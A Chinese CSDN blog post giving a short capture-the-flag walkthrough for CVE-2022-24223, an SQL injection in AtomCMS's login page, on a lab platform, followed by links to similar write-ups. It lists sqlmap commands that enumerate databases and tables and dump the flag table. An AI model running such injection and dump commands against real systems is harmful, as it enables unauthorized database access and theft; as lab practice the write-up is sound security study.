春秋云境CVE-2022-24223

4caf1

已于 2024-05-10 13:55:23 修改

阅读量406

点赞数 5

CC 4.0 BY-SA版权

分类专栏：做题日记文章标签：安全 web安全数据库 sql 计算机网络

于 2024-05-10 13:51:14 首次发布

本文链接：https://blog.csdn.net/2303_76653367/article/details/138663032

做题日记专栏收录该内容

32 篇文章

订阅专栏

简单的sql注入

简介

AtomCMS SQL注入漏洞

正文

1.进入靶场，没发现什么东西，直接dirsearch扫目录

2.访问login.php3.随便输入数据，抓包

4.把POST包直接丢sqlmap跑，爆库

sqlmap -r 3322.txt --batch --dbs

5.爆表

sqlmap -r 3322.txt --batch -D atomcms --tables

6.发现flag，直接爆数据

sqlmap -r 3322.txt --batch -D atomcms -T flag --dump

得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

4caf1

关注关注

5
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CVE-2022-24223 - AtomCMS SQL注入漏洞

Debugging

10-31

563

CVE-2022-24223 - AtomCMS SQL注入漏洞

【春秋云境.com】CVE-2022-32991通关思路

BG_ONE的博客

12-04

1183

【春秋云境.com】CVE-2022-32991思路

1 条评论您还未登录，请先登录后发表或查看评论

CVE-2022-24223

m0_51674437的博客

07-25

306

CVE-2022-24223漏洞复现

春秋云镜 CVE-2022-24223

qq_22002773的博客

07-08

464

春秋云镜 CVE-2022-24223

春秋云境：CVE-2022-24223

一只爱吃橙子的羊

12-02

1532

AtomCMS SQL注入漏洞

Atom CMS SQL注入（CVE-2022-24223）

weixin_68999845的博客

08-16

642

CVE-2022-24223

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用

10-27

在2022年，Spring Framework 发现了一个严重的远程命令执行（RCE）漏洞，被称为CVE-2022-22965，也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁，因为攻击者可以利用它来执行...

【春秋云境】CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞

HMX404的博客

04-17

1107

S-CMS v5.0 被发现存在SQLI。

Apache commons-text和Configuration 命令执行CVE-2022-42889/CVE-2022-33980分析

你和萤火虫有两个共同点，在我的眼里都会发光，同时，都已经很多年没见了

10-15

2450

Apache commons-text/Configuration 命令执行CVE-2022-42889、CVE-2022-33980分析

AtomCMS SQL注入漏洞(CVE-2022-24223)

qq_69432323的博客

07-23

318

AtomCMS SQL注入漏洞。

Atom CMS v2.0 SQL 注入漏洞（CVE-2022-24223）

Flag少侠的博客

07-08

9643

打开靶场进入靶场是这样一个东西这里不存在漏洞点，漏洞点在 admin/login.php 中随便输入数值登录打开 BurpSuite 拦截数据包复制数据包的值到 txt 文件中这里跳过了前面爆库爆表环节，直接找 flag_____H__------[Y/n] n1[1 entry]| flag |

春秋云境：CVE-2022-24223（AtomCMS SQL注入漏洞）

m0_65712192的博客

07-22

905

春秋云境：CVE-2022-24223（AtomCMS SQL注入漏洞）

【春秋云境】CVE-2022-24223复现

小高工作室

12-01

438

命令查看下 python sqlmap.py -r 2.txt -D atomcms -T flag --columns --dump。域名home改成admin试试。有个奇怪的atomcms。

【春秋云境】CVE-2022-24263靶场WP和CVE-2022-24223靶场WP

果粒程

12-01

759

【春秋云境】CVE-2022-24263靶场WP和CVE-2022-24223靶场WP

点击劫持：潜藏在指尖的安全陷阱

fys15925190510的博客

07-27

987

随后，通过代码将这些恶意元素设置为全透明状态，并精准覆盖在用户可能点击的正常按钮上，如 “关闭广告”“查看详情” 等。在网页端，攻击者可能搭建一个看似正常的视频网站，当用户点击 “播放” 按钮时，透明的恶意元素会引导用户点击 “确认下载某软件”，而该软件实则为病毒或挖矿程序。例如，当用户在某款工具类 APP 中点击 “领取优惠券” 时，实际触发的是 “允许该应用发送付费短信” 的授权弹窗，导致手机被强制扣除话费。例如，点击后弹出带有随机验证码的确认框，或要求用户拖动滑块完成验证，确保操作是用户的真实意图。

金融专题｜某跨境支付机构：以榫卯企业云平台 VPC 功能保障业务主体安全

最新发布

SmartX 超融合

07-31

494

业务隔离，灵活互访，安全管理，精简运维。

企业微信「数据与智能专区」解析：如何实现敏感数据安全分析与价值挖掘？

WSYUNYAO的博客

07-30

347

目前，部分官方服务商的工具（如「微盛·会话管家」）已完成适配，其架构采用“专区内分析节点+外部展示节点”的分离设计，分析节点部署于沙箱，展示节点通过API获取脱敏结果，确保前端无敏感数据流转。「数据与智能专区」这类“安全+智能”的方案，通过技术闭环解决了“分析与安全”的矛盾，未来将成为企业微信生态中的刚需。不管是企业微信自带的工具，还是外面服务商做的工具，都得在里面工作。对企业而言，尽早布局这类方案，不仅能规避风险，更能抢占数据价值的先机——毕竟，在合规的前提下用好数据，才是企业长久发展的关键。

春秋云境CVE-2022-29464

09-05

春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码，进而导致服务器受到攻击。根据引用，在GitHub上有一个项目，其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析，可以参考引用中提到的文章。123 #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞（CVE-2022-29464）](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]